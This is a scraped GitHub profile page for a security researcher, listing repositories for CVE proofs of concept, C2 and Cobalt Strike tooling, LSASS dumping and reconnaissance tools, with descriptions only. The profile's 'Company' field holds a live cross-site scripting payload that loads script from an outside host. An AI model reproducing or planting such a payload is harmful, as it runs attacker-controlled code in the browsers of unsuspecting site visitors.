Andy | ZephrFish (ZephrFish)

ZephrFish

Geek Repo

Company:"><script src="https://xss.r1.pe"></script>

Location:Scotland

Home Page:https://blog.zsec.uk

Twitter:@ZephrFish

Github PK Tool:Github PK Tool


Organizations
dc44141

Andy | ZephrFish's repositories

static-tools

Static compiled binaries + scripts ready to use on systems

Exch-CVE-2021-26855

CVE-2021-26855: PoC (Not a HoneyPoC for once!)

Language:PythonStargazers:27Issues:4Issues:0

CVE-2020-16898

HoneyPoC 2.0: Proof-of-Concept (PoC) script to exploit IPv6 (CVE-2020-16898).

PurpleTeamWorkshop-LabManual

Purple Team Workshop by @jorgeorchilles

Stargazers:8Issues:0Issues:0
Language:PythonStargazers:5Issues:0Issues:0

CVE-2021-22986_Check

CVE-2021-22986 Checker Script in Python3

Language:PythonStargazers:4Issues:2Issues:0

iRecon

Of the thousands of lazy reconnaissance scripts, this one is by far the one in this repository.

Language:PythonLicense:NOASSERTIONStargazers:3Issues:0Issues:0

openvpn-install-1

Set up your own OpenVPN server on Debian, Ubuntu, Fedora, CentOS or Arch Linux.

License:MITStargazers:3Issues:0Issues:0

rengine

reNgine is an automated reconnaissance framework meant for gathering information during penetration testing of web applications. reNgine has customizable scan engines, which can be used to scan the websites, endpoints, and gather information.

License:GPL-3.0Stargazers:3Issues:0Issues:0

Bloodhound-Custom-Queries

Custom Query list for the Bloodhound GUI based off my cheatsheet

Stargazers:2Issues:0Issues:0
Language:ShellStargazers:2Issues:0Issues:0

SharpC2

.NET C2 Framework Proof of Concept

License:GPL-3.0Stargazers:2Issues:0Issues:0

spiderfoot

SpiderFoot automates OSINT collection so that you can focus on analysis.

License:GPL-2.0Stargazers:2Issues:0Issues:0

SSH_Notify

Different Scripts for SSH hardening blog

Language:PythonStargazers:2Issues:0Issues:0

AggressorScripts

Aggressor scripts for use with Cobalt Strike 3.0+

License:BSD-3-ClauseStargazers:1Issues:0Issues:0

CobaltStrikeToGhostWriter

Log converter from CS log to Ghostwriter CSV

Stargazers:1Issues:0Issues:0
Stargazers:1Issues:0Issues:0

JSA

Javascript security analysis (JSA) is a program for javascript analysis during web application security assessment.

License:GPL-3.0Stargazers:1Issues:0Issues:0

MirrorDump

Another LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory

Stargazers:1Issues:0Issues:0

NTLMRecon

Enumerate information from NTLM authentication enabled web endpoints 🔎

License:MITStargazers:1Issues:0Issues:0

Open-source-tools-for-CTI

Professional Repository of my tools

Stargazers:1Issues:0Issues:0

pentest-tools

Custom pentesting tools

Stargazers:1Issues:0Issues:0
Stargazers:1Issues:0Issues:0

SharpEDRChecker

Checks running processes, process metadata, Dlls loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.

License:BSD-3-ClauseStargazers:1Issues:0Issues:0

sysmon-config

Sysmon configuration file template with default high-quality event tracing

Stargazers:1Issues:0Issues:0

velocipher

Digging Deeper....

License:NOASSERTIONStargazers:1Issues:0Issues:0

webhook

A simple webhook server

License:NOASSERTIONStargazers:1Issues:0Issues:0

byt3bl33d3r

Github Profile Readme

Stargazers:0Issues:0Issues:0
Stargazers:0Issues:0Issues:0

openvpn-install

OpenVPN road warrior installer for Ubuntu, Debian, CentOS and Fedora

License:MITStargazers:0Issues:0Issues:0